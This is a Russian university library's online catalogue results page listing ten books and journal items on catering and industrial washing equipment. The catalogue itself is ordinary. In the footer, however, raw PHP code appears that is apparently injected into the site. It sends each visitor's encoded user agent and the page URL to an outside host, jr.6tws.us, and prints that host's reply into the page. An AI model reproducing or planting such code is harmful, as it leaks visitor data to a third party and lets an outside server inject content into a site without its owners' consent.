Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

175 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МОЕЧНАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
2. 
Гузман, Михаил Абрамович. Технологическое оборудование гостиниц и ресторанов [Текст] / М. А. Гузман, А. С. Горбатова, 2010. - 75 с.
Держатели документа (Информация об экземплярах) 

В данной работе рассматриваются основные виды оборудования, распространенные на предприятиях общественного питания при гостиничных комплексах.

Для студентов специальности 080502 "Экономика и управление на предприятии. Гостиничное, ресторанное, туристское хозяйство".

3. 
Пасько, Ольга Владимировна. Проектирование предприятий общественного питания. Доготовочные цеха и торговые помещения [Текст] / О. В. Пасько, О. В. Автюхова, 2019. - 230, [1] с.
Держатели документа (Информация об экземплярах) 

Серия "Университеты России" позволит вузам нашей страны использовать в образовательном процессе учебники и учебные пособия по различным дисциплинам, подготовленные преподавателями лучших университетов России и впервые опубликованные в издательствах университетов. Все представленные в этой серии учебники прошли экспертную оценку учебно-методического отдела издательства и публикуются в оригинальной редакции.

Учебное пособие включает основные положения и методики проектирования доготовочных специализированных цехов, а также вспомогательной и торговой группы помещений предприятий индустрии питания. Представлены варианты планировочных решений цехов с расстановкой технологического оборудования.

Для студентов высших учебных заведений, обучающихся по инженерно-техническим направлениям, а также всех интересующихся спецификой предприятий индустрии питания.

4. 
Машиностроитель. - Журнал, 2002г. № 5
Оглавление 
  • Таран, В. А. Повышение деловой активности и эффективности производства / В. А. Таран. - с.5-19 : ил.
  • Ласточкин, Ю. В. Пути выхода из инвестиционного кризиса крупных машиностроительных предприятий России / Ю. В. Ласточкин, И. И. Ицкович. - с.20-22
  • Тарасов, А. Н. упрочнение мелкоразмерных метизов скоростной высокотемпературной нитроцементацией / А. Н. Тарасов, В. А. Панфилов. - с.23-24
  • Ельцов, В. В. Исследование температурного поля при наплавке алюминиевых деталей с дифференцированным тепловложением / В. В. Ельцов, М. В. Тугай, А. С. Кашкаров. - с.25-27 : ил.
    Кл. слова: Сварка
  • Людаговский, А. В. К оценке повреждаемости волокон в титановых композитах / А. В. Людаговский, И. Л. Синани. - с.30-31 : ил.
  • Новокрещенов, А. П. Оборудование для мойки деталей и регенерации растворителей / А. П. Новокрещенов. - с.32-34 : ил.
    Кл. слова: Моечная машина
  • Использование ленточнопильных станков для разрезки плит и слитков / ; А. В. Иванов. - с.35 : ил.
    Кл. слова: Станок KASTOplate, Станок KASTObloc, Автоматизация
  • Пестунов, В. М. Анатомия роботов / В. М. Пестунов. - с.36-44 : ил.
  • Гудков, А. Г. Оценка рисков при реализации высокотехнологичного наукоемкого проекта / А. Г. Гудков. - с.45-49 : ил.
Держатели документа (Информация об экземплярах) 
5. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
6. 
Оборудование предприятий общественного питания [Текст] : Учебник гриф-УМО. Ч. 1 : Механическое оборудование / В. Д. Елхина, М. И. Ботов, 2010. - 415 с.

Рассмотрены классификация, устройство, принцип действия и правила эксплуатации, а также основные технико-экономические показатели машин и механизмов, используемых на предприятиях общественного питания для механической обработки пищевого сырья. Освещены технические решения по обеспечению высокого качества кулинарной продукции при минимальном расходе сырья и электроэнергии, приведены примеры расчетов использования сырья.

Для студентов учреждений высшего профессионального образования. Может быть полезен работникам предприятий общественного питания.

7. 
Приборы и средства автоматизации [Текст] : отраслевой кат. / Информприбор. 8. Средства механизации и автоматизации труда / Л. М. Дризовский, А. Ф. Соколиков, 1993. - 144, [2] с.
Ключевые слова 
ОТРАСЛЕВОЙ -- КАТАЛОГ -- МИКРОПРОЦЕССОРНАЯ -- СИСТЕМА -- МИКРОКОНТРОЛЛЕР -- ПРОМЫШЛЕННЫЙ -- РОБОТ -- УКА -- МЕХАНООБРАБОТКА -- ИНСТРУМЕНТАЛЬНОЕ -- ПРОИЗВОДСТВО -- ГПМС -- ГИБКИЙ -- ПРОИЗВОДСТВЕННЫЙ -- МОДУЛЬ -- МАНИПУЛЯТОР -- АВТОМАТ -- АГРЕГАТНЫЙ -- СТАНОК -- ГАЛЬВАНОПЛАСТИКА -- ОМД -- ДАВЛЕНИЕ -- ПРЕСС -- ПОЛОСОПОДАВИТЕЛЬ -- РОТОРНАЯ -- ЛИНИЯ -- ПОЛУАВТОМАТ -- ЛИТЬЕ -- СВАРКА -- СИЛЬФОН -- ДУГОВАЯ -- АРГОНОДУГОВАЯ -- РУЧНАЯ -- ПЕРЕРАБОТКА -- ПЛАСТМАССА -- ДОЗАТОР -- ДРОБИЛКА -- ПОДГОТОВКА -- ОКРАСКА -- РЕГЕНЕРАЦИЯ -- УСТАНОВКА -- МОЕЧНАЯ -- СУШИЛЬНАЯ -- ВАННА -- УЛЬТРАЗВУКОВАЯ -- ТЕРМОКАМЕРА -- КАМЕРА -- ОПЛАВЛЕНИЕ -- ОХЛАЖДЕНИЕ -- КАЛОРИФЕР -- ТАРА -- УПАКОВКА -- СКЛАД -- МИКРОСХЕМА -- ПЕЧАТНАЯ -- ПЛАТА -- ЭКСПОНИРОВАНИЕ -- СКРАЙБЕР -- ОЧИСТКА -- ФЛЮС -- СБОРКА -- МОНТАЖ -- ВИБРОПРИВОД -- КОНТРОЛЬ -- ИСПЫТАНИЕ -- РЕГУЛИРОВКА -- ТЕСТЕР -- СИГНАТУРНЫЙ -- ПРОБНИК
Оглавление 
  • 8.2. Нестандартизированное технологическое оборудование, оснастка и инструмент
Держатели документа (Информация об экземплярах) 
8. 
Черпаков, Борис Ильич. Вспомогательное оборудование зарубежных комплексных автоматических линий [Текст] : обзор / Б. И. Черпаков, Л. С. Брон, Г. М. Годович, 1976. - 49, [3] с.
Держатели документа (Информация об экземплярах) 
9. 
Бондаренко, Елена Викторовна. Основы проектирования и эксплуатации технологического оборудования [Текст] : учеб. для вузов по специальности "Автомобили и автомобильное хозяйство" направления подгот. "Эксплуатация наземного транспорта и транспортного оборудования" / Е. В. Бондаренко, Р. С. Фаскиев, 2011. - 302, [1] с.
Держатели документа (Информация об экземплярах) 

Подробно изложены теоретические основы расчета и конструирования специализированного технологического оборудования для проведения операций технического обслуживания и ремонта автомобилей. Даны классификации групп оборудования. Рассмотрены принципы действия и конструктивные особенности основных типов технологического оборудования. Описан порядок расчета и подбора основных элементов технического оборудования. Приведены основные положения системы технического обслуживания и ремонта технологического оборудования.

10. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.77 с.14 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;